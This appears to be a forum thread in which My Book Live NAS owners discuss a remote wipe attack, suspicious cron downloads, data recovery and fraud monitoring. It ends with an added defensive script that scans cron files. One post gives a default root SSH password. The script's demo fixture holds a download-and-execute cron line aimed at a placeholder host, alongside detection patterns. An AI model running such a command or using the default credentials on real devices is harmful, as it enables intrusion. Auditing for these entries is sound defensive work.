Since you mentioned this was a cron job, any thoughts on whether this was an already compromised machine where the commands were scheduled for execution? Could this be sitting on machines now without their knowledge, waiting to be executed?
That is a very good point. I am glad you mentioned it.
I’m thinking everybody should ssh into their Western Digitals and cd to the etc directory and look at their crontab file. One way to do that is type “cat /etc/crontab”.
Basically, when those crontab entries are activated, the files w or wB could end up being anything, doing anything.
The bogus nttpd executable could be doing anything.
So yes, definitely. If entries in crontab have wget commands in them, pull your NAS from the network, pull the plug.
More direct answer: yes, I think it's possible that other devices have malware on them.
Cron in my case was causing a periodic download of “w” and “wB”
Haven’t ever ssh’d into my NAS. What credentials should I be using? Admin/router pass?
First, SSH has to be enabled from the web control panel.
Do a Google search; I'm not at a place where I have the info.
From memory I think the ssh user is root and the password is welc0me.
This happened to me too in Canada, GUI says a factory reset was performed on the 23rd. Years of data gone that I stupidly did not back up. That will teach me I guess. Is there any indication at this point that data was stolen from the drives or that the drives were somehow used to gain access to other things on our network? I had tax returns saved on there for the past few years for me and my parents so now I’m super paranoid that my data has been stolen or my computers are vulnerable. I’ve since entirely removed the drive from my network and unplugged it.
Me too LOL…WD is so stupid…
I tried R-Studio but the vast majority of the data is corrupted
I have identical content - lots of ripped DVDs I didn't want to drag around - I have read of reasonable success with PhotoRec for these file types and tried to control my My Book Live drive over Ethernet. Doesn't seem possible. I am going to purchase a SATA to USB adaptor and go that way. Has anyone tried this with the PhotoRec app on large video files and been successful?
After turning ssh on, I logged in via a command line and poked around some. Not seeing anything odd in crontab. Just some daily/weekly/monthly files. Looking in those directories, nothing looks out of place. Files all show older dates. So either my firewall saved me or my older firmware did not contain the exploit.
Got it. Tks
I’m a MBL Duo user from Canada. The device logs show that it rebooted (but did not reset) at 4:04 AM on the 23rd. All of my files are still intact. I didn’t give the notification email about it rebooting any thought because, coincidentally, there was a power outage at 7AM, so it didn’t seem unusual. Strangely, despite the power outage, the logs only show the one reboot at 4AM.
Some details that may be useful to others more knowledgeable about these things:
Firmware Version: 02.43.03-022
Auto Update: Disabled
Remote Access: Enabled (Automatic)
Router UPnP: Enabled
I’ve since disconnected the device from my router (and disabled UPnP). I have a full backup of all important data on an external USB drive, but there are still some files I’d like to get off it. I’ll connect it directly to a laptop to copy those files and take a look at the crontab, which I’ve been using for years to do a nightly rsync to the external USB.
Thank you for your post. Let us know if you have complete success. I mailed my WD NAS on Friday and it will arrive Monday. The best support I had received from Western Digital was to take it to a recovery company. All data gone from our entire lives until 5 years ago. I hope it works.
Unfortunately I had the same problem 2 days ago. I also found in user.log the record related to “factoryRestore.sh: begin script”.
I checked my current home network configuration in the internet router:
UPNP = off
NAT/PAT = none
DMZ = yes (My Book Live Duo IP address)
In the My Book Live Duo settings:
Remote Access = Enable not checked
I removed the DMZ configuration in the internet router and blocked the My Book Live Duo IP address to prevent access to the Internet. I am now trying to reinstall the My Book Live Duo starting from a fresh factory restore.
One has to wonder why they deleted devices without a ransom. Perhaps it was to cover their tracks somehow? Frankly, since the vulnerability allowed the attackers to run commands on the devices as root, there’s no reason to think data couldn’t have been accessed. If I’m wrong, someone please chime in and correct me.
I hope your tax returns were at least password protected by TurboTax or something like that? Either way, I would set up fraud monitoring if enough sensitive info was potentially released. I hope your data wasn’t accessed, but I also would be proactive if I were you in protecting yourself from potential fraud.
In the end, this hack may turn out to be worse for some than others depending on what kind of data was on their WD devices.
I’m not really sure how to set up fraud monitoring? I think the only personal info I had on there was a copy of mine and my parents' tax returns for the past couple of years, and my credit card statements. The credit card I can monitor online for any weird activity. Not sure what to do about a potential breach of our social insurance numbers though. The Canadian government website suggests calling one of the credit bureaus to monitor your file so I guess I’ll do that Monday.
Also, if anyone has any suggestions for someone not networking-inclined to make sure my network is otherwise secure now that I’ve unplugged the MBL, I’d greatly appreciate it.
So I’m one of the lucky ones and found this thread coincidentally 2 days ago on reddit… my device is double backed up and everything on it is encrypted so I wasn’t worried and kept it running till this morning… everything on it was disabled including ssh except remote control which I needed… right now it’s running but I disabled remote control and cut off the internet from and to it via the modem firewall.
yeah i have a desktop. I shall have a look what connectors are available…
All connected and recognising the drive, now the long task of running partition recovery.
(Sorry, late recovery; got a limit of posts on my first days posting)
i can’t find the UPnP setting on the WD device
This is all I get from cat /etc/crontab :

MyBookLive:~# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0 3     * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
10 3    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
20 3    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
What other commands should I do from here to see if I’m compromised?
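As an added example (not posted by anyone in this thread), the crontab check suggested earlier and the "what else should I look at" question above can be combined into one script: it walks /etc/crontab, /etc/cron.d and the cron.hourly/daily/weekly/monthly directories and flags any non-comment line that fetches over the network (wget/curl), runs from /tmp or /var/tmp, or invokes the "w"/"wB" names reported in the thread. The demo directory, the cron.d file name and the placeholder URL are constructed for the example and are not from any real device.

```shell
#!/bin/sh
# Audit cron entries on a My Book Live (or any Debian-style box) for
# download-and-execute patterns. Run on the NAS as: sh cron_audit.sh /etc

# Prints every suspicious cron line with its file and line number.
# Returns 0 if anything suspicious was found, 1 if the cron tree looks clean.
scan_cron_dir() {
  etc_dir="${1:-/etc}"
  found=1
  for f in "$etc_dir/crontab" "$etc_dir"/cron.d/* "$etc_dir"/cron.hourly/* \
           "$etc_dir"/cron.daily/* "$etc_dir"/cron.weekly/* "$etc_dir"/cron.monthly/*; do
    [ -f "$f" ] || continue
    # Drop comment lines first so the stock header text is never flagged, then
    # look for network fetches, temp-dir execution, or a bare "w" / "wB" command.
    if grep -v '^[[:space:]]*#' "$f" | \
       grep -En 'wget|curl|/tmp/|/var/tmp/|(^|[ /])wB?([ ;&|]|$)'; then
      echo "SUSPICIOUS: $f"
      found=0
    fi
  done
  return $found
}

# Constructed demo tree: the stock Debian crontab (clean) plus one cron.d
# fragment shaped like the periodic download described in the thread.
# The URL is a placeholder, not a real indicator.
make_demo() {
  d=$(mktemp -d)
  mkdir -p "$d/cron.d" "$d/cron.daily"
  cat > "$d/crontab" <<'EOF'
SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
0 3 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
EOF
  cat > "$d/cron.d/update" <<'EOF'
*/10 * * * * root wget -q http://EXAMPLE-PLACEHOLDER/w -O /tmp/w && chmod +x /tmp/w && /tmp/w
EOF
  echo "$d"
}

# Only run the demo when explicitly asked, so the functions can be sourced safely.
if [ "${1:-}" = "--demo" ]; then
  demo=$(make_demo)
  scan_cron_dir "$demo" || echo "clean: $demo"
fi
```

On a real device, the stock crontab shown above should produce no output; any hit in cron.d or the run-parts directories deserves a look at the file's timestamp and contents before the box goes back online.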